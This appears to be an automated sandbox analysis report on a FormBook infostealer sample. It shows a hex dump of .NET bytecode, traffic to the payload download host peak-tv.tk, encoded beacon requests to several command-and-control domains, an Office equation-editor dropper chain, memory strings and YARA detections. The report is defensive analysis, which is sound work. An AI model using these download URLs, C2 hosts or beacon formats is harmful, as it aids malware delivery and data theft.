00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00
Source: global traffic; HTTP traffic detected: GET /medicomzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: peak-tv.tk | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Thu, 13 Jan 2022 17:18:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: 179 | X-Sorting-Hat-ShopId: 59690647732 | X-Dc: gcp-europe-west1 | X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81 | X-Content-Type-Options: nosniff | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Download-Options: noopen | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 6cd048db19b64333-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 
65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 13 Jan 2022 17:18:53 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576d-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://led24.de/iconset/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://p.yusukekamiyamane.com/
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://splashyfish.com/icons/
          Source: explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.513680511.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427688926.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431896377.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.448802217.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://www.fatcow.com/free-icons/
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://www.gnome.org/
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp01l
          Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
          Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp | String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: medicomsh78694.exe | String found in binary or memory: https://github.com/proviq/lusrmgr
          Source: medicomsh78694.exe | String found in binary or memory: https://github.com/proviq/lusrmgr/
          Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
          Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | String found in binary or memory: https://visualpharm.com/must_have_icon_set/
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
          Source: unknown | DNS traffic detected: queries for: peak-tv.tk
          Source: global traffic | HTTP traffic detected: GET /medicomzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: peak-tv.tk | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.prestigiousuniforms.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.muzicalbox.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.extraordinarymiracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1 | Host: www.realstakepool.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          .NET source code contains very large strings
          Source: medicomzx[1].exe.2.dr, MainForm.cs | Long String: Length: 22528
          Source: medicomsh78694.exe.2.dr, MainForm.cs | Long String: Length: 22528
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | Long String: Length: 22528
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs | Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs | Long String: Length: 22528
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs | Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs | Long String: Length: 22528
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
